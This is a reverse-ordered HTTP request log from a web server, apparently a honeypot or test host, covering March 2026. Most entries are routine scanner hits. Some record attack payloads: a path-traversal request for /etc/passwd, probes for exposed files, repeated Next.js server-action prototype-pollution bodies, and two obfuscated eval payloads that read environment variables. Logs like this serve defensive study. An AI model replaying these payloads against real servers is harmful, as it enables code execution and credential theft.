URL: /robots.txt
Method: GET
[2026-03-17 04:12:01] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 169.197.113.175:49984
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-17 04:12:01] === HTTP Request ===
[2026-03-17 04:11:43] Main page accessed - IP: 169.197.113.175:34302
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 169.197.113.175:34302
Path: /
URL: /
Method: GET
[2026-03-17 04:11:43] === HTTP Request ===
[2026-03-17 04:07:06] Main page accessed - IP: 176.65.149.45:56692
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:56692
Path: /
URL: /
Method: GET
[2026-03-17 04:07:06] === HTTP Request ===
[2026-03-17 01:58:53] Main page accessed - IP: 172.30.0.12:35372
===================
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 198.235.24.225
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35372
Path: /
URL: /
Method: GET
[2026-03-17 01:58:53] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 37.187.71.75:54572
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-16 23:50:28] === HTTP Request ===
[2026-03-16 23:50:28] Main page accessed - IP: 85.217.140.28:48520
===================
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.28:48520
Path: /
URL: /
Method: GET
[2026-03-16 23:50:28] === HTTP Request ===
[2026-03-16 23:01:31] Main page accessed - IP: 207.90.244.20:55514
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 207.90.244.20:55514
Path: /
URL: /
Method: GET
[2026-03-16 23:01:31] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 185.65.245.10:7227
RemoteAddr: 185.242.3.25:17636
Path:
URL: //185.65.245.10:7227
Method: CONNECT
[2026-03-16 22:37:59] === HTTP Request ===
===================
Accept-Language: zh-CN,zh;q=0.8
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.119.83:38808
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-16 22:12:40] === HTTP Request ===
[2026-03-16 22:12:40] Main page accessed - IP: 121.43.119.83:38756
===================
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept-Language: zh-CN,zh;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 121.43.119.83:38756
Path: /
URL: /
Method: GET
[2026-03-16 22:12:40] === HTTP Request ===
[2026-03-16 21:27:01] Main page accessed - IP: 205.210.31.202:55740
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 205.210.31.202:55740
Path: /
URL: /
Method: GET
[2026-03-16 21:27:01] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:45468
Path: /jars
URL: /jars
Method: GET
[2026-03-16 19:15:10] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.231.89.232:49205
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-16 18:37:29] === HTTP Request ===
[2026-03-16 18:35:34] Main page accessed - IP: 91.231.89.234:59157
===================
Connection: close
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.231.89.234:59157
Path: /
URL: /
Method: GET
[2026-03-16 18:35:34] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 183.81.169.235:35044
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-16 15:39:54] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50049
Path: /.openclaw/workspace/db.sqlite
URL: /.openclaw/workspace/db.sqlite
Method: GET
[2026-03-16 14:35:29] === HTTP Request ===
[2026-03-16 14:09:48] Main page accessed - IP: 34.76.68.11:39170
===================
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.76.68.11:39170
Path: /
URL: /
Method: GET
[2026-03-16 14:09:48] === HTTP Request ===
===================
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Referer: https://admin.vulnberries.ru/
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 46.101.79.47
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Accept-Encoding: gzip, deflate
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
X-Forwarded-Proto: https
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44308
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-16 13:58:27] === HTTP Request ===
[2026-03-16 13:58:26] Main page accessed - IP: 172.30.0.12:44308
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-User: ?1
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
Sec-Ch-Ua: "Chromium";v="142", "Not:A-Brand";v="24", "Brave";v="142"
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Via: 1.1 Caddy
Sec-Gpc: 1
Sec-Fetch-Mode: navigate
X-Forwarded-For: 46.101.79.47
Sec-Fetch-Dest: document
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:44308
Path: /
URL: /
Method: GET
[2026-03-16 13:58:26] === HTTP Request ===
[2026-03-16 13:17:48] Main page accessed - IP: 139.59.170.85:38990
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 139.59.170.85:38990
Path: /
URL: /
Method: GET
[2026-03-16 13:17:48] === HTTP Request ===
[2026-03-16 11:59:31] Main page accessed - IP: 172.30.0.12:40140
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 204.76.203.25
Via: 1.1 Caddy
Accept-Encoding: identity
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40140
Path: /
URL: /
Method: GET
[2026-03-16 11:59:31] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:35564
Path: /jars
URL: /jars
Method: GET
[2026-03-16 11:34:26] === HTTP Request ===
[2026-03-16 11:27:29] Main page accessed - IP: 44.220.185.125:54156
===================
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/59.0.3007.79 Safari/537.32
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 44.220.185.125:54156
Path: /
URL: /
Method: GET
[2026-03-16 11:27:29] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.125:60330
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-16 10:47:04] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 162.142.125.125:60318
Path: *
URL: *
Method: PRI
[2026-03-16 10:47:03] === HTTP Request ===
[2026-03-16 10:47:03] Main page accessed - IP: 162.142.125.125:60306
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 162.142.125.125:60306
Path: /
URL: /
Method: GET
[2026-03-16 10:47:03] === HTTP Request ===
[2026-03-16 10:19:32] Main page accessed - IP: 34.79.232.97:43980
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.79.232.97:43980
Path: /
URL: /
Method: GET
[2026-03-16 10:19:32] === HTTP Request ===
[2026-03-16 09:55:09] Main page accessed - IP: 176.65.149.45:59624
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:59624
Path: /
URL: /
Method: GET
[2026-03-16 09:55:09] === HTTP Request ===
===================
X-Forwarded-Host: admin.vulnberries.ru
From: oai-searchbot(at)openai.com
X-Forwarded-For: 74.7.241.160
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
X-Openai-Host-Hash: 867116608
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:39286
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-16 06:55:15] === HTTP Request ===
===================
------WebKitFormBoundaryx950856614574--
------WebKitFormBoundaryx950856614574
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx950856614574
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 202667+true+4691719;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx950856614574
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx950856614574
X-Nextjs-Html-Request-Id: ilovepoop_950856614574
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:53808
Path: /api/route
URL: /api/route
Method: POST
[2026-03-16 04:46:13] === HTTP Request ===
===================
------WebKitFormBoundaryx407930396638--
------WebKitFormBoundaryx407930396638
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx407930396638
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 91779+true+4444703;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx407930396638
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_407930396638
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx407930396638
X-Nextjs-Request-Id: poop1234
Next-Action: x
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:53804
Path: /app
URL: /app
Method: POST
[2026-03-16 04:46:13] === HTTP Request ===
===================
------WebKitFormBoundaryx78820269276--
------WebKitFormBoundaryx78820269276
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx78820269276
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 22055+true+3573805;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx78820269276
X-Nextjs-Html-Request-Id: ilovepoop_78820269276
Connection: close
Content-Length: 513
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx78820269276
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:53760
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-16 04:46:12] === HTTP Request ===
===================
------WebKitFormBoundaryx2278717442561--
------WebKitFormBoundaryx2278717442561
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx2278717442561
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 302384+true+7535840;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx2278717442561
Next-Action: x
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_2278717442561
Content-Length: 522
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx2278717442561
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:53756
Path: /api
URL: /api
Method: POST
[2026-03-16 04:46:11] === HTTP Request ===
===================
------WebKitFormBoundaryx610153597033--
------WebKitFormBoundaryx610153597033
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx610153597033
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 128408+true+4751679;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx610153597033
X-Nextjs-Html-Request-Id: ilovepoop_610153597033
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx610153597033
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
Content-Length: 518
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:53720
Path: /_next
URL: /_next
Method: POST
[2026-03-16 04:46:11] === HTTP Request ===
[2026-03-16 04:46:10] Main page accessed - IP: 193.32.162.28:53652
===================
------WebKitFormBoundaryx255291417101--
------WebKitFormBoundaryx255291417101
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx255291417101
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 253675+true+1006372;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx255291417101
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx255291417101
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_255291417101
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.32.162.28:53652
Path: /
URL: /
Method: POST
[2026-03-16 04:46:10] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.141:45756
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-16 04:40:47] === HTTP Request ===
[2026-03-16 04:40:47] Main page accessed - IP: 85.142.100.141:45750
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.141:45750
Path: /
URL: /
Method: GET
[2026-03-16 04:40:47] === HTTP Request ===
[2026-03-16 04:03:17] Main page accessed - IP: 198.235.24.195:50272
===================
Accept: */*
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.0
Host:
RemoteAddr: 198.235.24.195:50272
Path: /
URL: /
Method: GET
[2026-03-16 04:03:17] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.137:41332
Path: /containers/
URL: /containers/
Method: GET
[2026-03-16 03:38:57] === HTTP Request ===
[2026-03-16 02:53:11] Main page accessed - IP: 198.235.24.249:59232
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.249:59232
Path: /
URL: /
Method: GET
[2026-03-16 02:53:11] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.234:33279
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-15 23:49:29] === HTTP Request ===
[2026-03-15 23:49:29] Main page accessed - IP: 104.152.52.234:41681
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.234:41681
Path: /
URL: /
Method: GET
[2026-03-15 23:49:29] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50021
Path: /constants.py
URL: /constants.py
Method: GET
[2026-03-15 21:27:01] === HTTP Request ===
[2026-03-15 20:21:09] Main page accessed - IP: 176.65.149.45:41424
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:41424
Path: /
URL: /
Method: GET
[2026-03-15 20:21:09] === HTTP Request ===
[2026-03-15 20:01:06] Main page accessed - IP: 64.225.74.178:47508
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 64.225.74.178:47508
Path: /
URL: /
Method: GET
[2026-03-15 20:01:06] === HTTP Request ===
===================
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:33376
Path: /jars
URL: /jars
Method: GET
[2026-03-15 18:21:27] === HTTP Request ===
[2026-03-15 18:05:06] Main page accessed - IP: 172.30.0.12:36556
===================
{"\u005f\u0072\u0065\u0073\u0070\u006f\u006e\u0073\u0065":{"\u005f\u0070\u0072\u0065\u0066\u0069\u0078":"var kyo=arguments[0x1];var jvdrp=kyo;try{var _v=((0,eval)(global[\"\\x42\\x75\\x66\\x66\\x65\\x72\"].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327292c66733d617761697420696d706f72742827667327292c706174683d617761697420696d706f727428277061746827292c687474703d617761697420696d706f727428276874747027292c68747470733d617761697420696d706f72742827687474707327292c7b4275666665727d3d617761697420696d706f7274282762756666657227293b636f6e737420523d7b7d2c453d70726f636573732e656e762c454b3d4f626a6563742e6b6579732845292c45563d4f626a6563742e656e74726965732845293b636f6e73742072643d703d3e7b7472797b72657475726e2066732e7265616446696c6553796e6328702c277574663827297d636... [truncated]
Content-Disposition: form-data; name="0"
--geckopartBB96hr92whukYsgGRFVQKiuGr
dk6uLCYN2GQoShkR0KcEfl4W3q
Content-Disposition: form-data; name="_token"
Body: --geckopartBB96hr92whukYsgGRFVQKiuGr
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
Origin: https://admin.vulnberries.ru
Accept-Language: en-US,en;q=0.9,de;q=0.8
X-Forwarded-Proto: https
X-Forwarded-For: 34.59.214.115
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Content-Type: multipart/form-data; boundary=geckopartBB96hr92whukYsgGRFVQKiuGr
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Fetch-Dest: empty
Sec-Ch-Ua: "Chromium";v="134", "Not_A Brand";v="24"
Via: 1.1 Caddy
Next-Action: 86f9d333b371f5892be9c087b1df81b4b81bb401
Content-Length: 15906
X-Forwarded-Host: admin.vulnberries.ru
Referer: https://admin.vulnberries.ru/
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36556
Path: /
URL: /
Method: POST
[2026-03-15 18:05:06] === HTTP Request ===
[2026-03-15 18:02:53] Main page accessed - IP: 172.30.0.12:42890
===================
{"\u005f\u0072\u0065\u0073\u0070\u006f\u006e\u0073\u0065":{"\u005f\u0070\u0072\u0065\u0066\u0069\u0078":"var wbyq=arguments['\\x31'];var yefyx=wbyq;try{var _v=((0,eval)(global[\"\\x42\\x75\\x66\\x66\\x65\\x72\"].from('286173796e632066756e6374696f6e28297b636f6e7374206f733d617761697420696d706f727428276f7327292c66733d617761697420696d706f72742827667327292c706174683d617761697420696d706f727428277061746827292c687474703d617761697420696d706f727428276874747027292c68747470733d61776169742... [truncated]
Content-Disposition: form-data; name="0"
--boundaryFtnIFUGjQiS6vIuY7g9S
9nFY86Gg2kRXA9SJLT73
Content-Disposition: form-data; name="ygsfp"
--boundaryFtnIFUGjQiS6vIuY7g9S
BOgixYh5diL7L9BTOTG3C0HhpfKIdoKwjnBmV5jfagCuyBO6PkndeMKA1eC1cbLBQ0ucoNR0zkHQFe8fXFQzdBVrccGJMTC39kJnqzM2TNnvtnAQ
Content-Disposition: form-data; name="hukt"
--boundaryFtnIFUGjQiS6vIuY7g9S
PYGSMppNxDRIw2HqFvo4hxZHSUyMtzsLXa1BM8xb5qu4LJpgLWKW
Content-Disposition: form-data; name="csrfmiddlewaretoken"
Body: --boundaryFtnIFUGjQiS6vIuY7g9S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://admin.vulnberries.ru/
Next-Action: 8755925e3666cd622e8e94cdd54c8b2b377ac426
Dnt: 1
Accept-Language: en,en-US;q=0.9
Accept: text/x-component
Content-Length: 16171
Sec-Ch-Ua: "Chromium";v="135", "Not_A Brand";v="24"
Origin: https://admin.vulnberries.ru
Accept-Encoding: gzip, deflate
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=boundaryFtnIFUGjQiS6vIuY7g9S
X-Forwarded-Proto: https
X-Forwarded-For: 34.31.247.93
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:42890
Path: /
URL: /
Method: POST
[2026-03-15 18:02:53] === HTTP Request ===
[2026-03-15 17:22:05] Main page accessed - IP: 172.30.0.12:48036
===================
